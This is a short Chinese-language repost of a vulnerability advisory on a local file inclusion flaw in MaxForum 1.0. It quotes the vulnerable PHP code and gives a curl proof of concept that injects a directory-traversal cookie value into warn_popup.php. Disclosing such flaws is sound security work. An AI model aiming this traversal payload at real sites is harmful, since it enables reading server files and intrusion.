+---------------------------------------+
| MaxForum v1.0.0 Local File Inclusion |
+---------------------------------------+
作者 ahwak2000 z.u5[at]hotmail[dot]com
下载地址
已测试版本 1.0
/MaxForum/includes/forums/warn_popup.php 该文件:
line 100 if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){
line 101 $board_lang = escape_string($_COOKIE['max_lang']);
line 102 }
line 103
line 104 @include "../../language/$board_lang";
line 105 @include "../../language/$board_lang.php";
/MaxForum/libs/php/functions.php 文件中
function escape_string($string) {
$string = addslashes($string);
$string = htmlspecialchars($string);
return $string;
}
测试证明
<?
$url=" www.2cto.com /MaxForum/";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php");
curl_setopt($ch, CURLOPT_COOKIE, "max_lang=../gpl.txt"); // <--- edit
$buffer = curl_exec($ch);
?>
#end
,www.xuhantao.com,涛涛电脑知识网